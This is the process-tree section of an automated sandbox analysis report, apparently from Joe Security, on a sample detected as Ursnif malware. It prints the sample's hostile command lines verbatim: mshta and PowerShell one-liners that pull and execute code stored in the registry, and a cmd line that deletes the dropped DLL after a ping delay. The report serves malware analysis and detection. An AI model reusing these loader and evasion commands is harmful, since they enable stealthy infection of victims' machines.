                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff610460000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Analysis Process: powershell.exe PID: 6972 Parent PID: 6856

                                                          General

                                                          Start time:06:46:16
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                                                          Imagebase:0x7ff777fc0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Analysis Process: conhost.exe PID: 6704 Parent PID: 6972

                                                          General

                                                          Start time:06:46:16
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: mshta.exe PID: 5772 Parent PID: 3352

                                                          General

                                                          Start time:06:46:19
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
                                                          Imagebase:0x7ff610460000
                                                          File size:14848 bytes
                                                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: powershell.exe PID: 5480 Parent PID: 5772

                                                          General

                                                          Start time:06:46:21
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
                                                          Imagebase:0x7ff777fc0000
                                                          File size:447488 bytes
                                                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: conhost.exe PID: 6448 Parent PID: 5480

                                                          General

                                                          Start time:06:46:21
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: csc.exe PID: 1304 Parent PID: 6972

                                                          General

                                                          Start time:06:46:25
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: cvtres.exe PID: 3932 Parent PID: 1304

                                                          General

                                                          Start time:06:46:26
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: csc.exe PID: 344 Parent PID: 5480

                                                          General

                                                          Start time:06:46:28
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: csc.exe PID: 5452 Parent PID: 6972

                                                          General

                                                          Start time:06:46:29
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: cvtres.exe PID: 3380 Parent PID: 344

                                                          General

                                                          Start time:06:46:31
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cvtres.exe PID: 3912 Parent PID: 5452

                                                          General

                                                          Start time:06:46:31
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: csc.exe PID: 5640 Parent PID: 5480

                                                          General

                                                          Start time:06:46:35
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
                                                          Imagebase:0x7ff677cd0000
                                                          File size:2739304 bytes
                                                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET

                                                          Analysis Process: control.exe PID: 4000 Parent PID: 6424

                                                          General

                                                          Start time:06:46:35
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff6dd8e0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cvtres.exe PID: 4880 Parent PID: 5640

                                                          General

                                                          Start time:06:46:37
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
                                                          Imagebase:0x7ff732960000
                                                          File size:47280 bytes
                                                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: rundll32.exe PID: 6504 Parent PID: 4000

                                                          General

                                                          Start time:06:46:39
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff6ce540000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: explorer.exe PID: 3352 Parent PID: 6972

                                                          General

                                                          Start time:06:46:41
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff720ea0000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, Author: Joe Security

                                                          Analysis Process: control.exe PID: 3548 Parent PID: 6388

                                                          General

                                                          Start time:06:46:43
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\control.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\control.exe -h
                                                          Imagebase:0x7ff6dd8e0000
                                                          File size:117760 bytes
                                                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: rundll32.exe PID: 6040 Parent PID: 3548

                                                          General

                                                          Start time:06:46:46
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff6ce540000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 4452 Parent PID: 3352

                                                          General

                                                          Start time:06:46:59
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                                                          Imagebase:0x7ff673be0000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: conhost.exe PID: 4584 Parent PID: 4452

                                                          General

                                                          Start time:06:46:59
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: PING.EXE PID: 6088 Parent PID: 4452

                                                          General

                                                          Start time:06:47:00
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping localhost -n 5
                                                          Imagebase:0x7ff704c90000
                                                          File size:21504 bytes
                                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 1460 Parent PID: 3352

                                                          General

                                                          Start time:06:47:06
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                                                          Imagebase:0x7ff673be0000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: conhost.exe PID: 6536 Parent PID: 1460

                                                          General

                                                          Start time:06:47:07
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: PING.EXE PID: 6372 Parent PID: 1460

                                                          General

                                                          Start time:06:47:09
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping localhost -n 5
                                                          Imagebase:0x7ff704c90000
                                                          File size:21504 bytes
                                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: RuntimeBroker.exe PID: 4084 Parent PID: 3352

                                                          General

                                                          Start time:06:47:10
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6225d0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >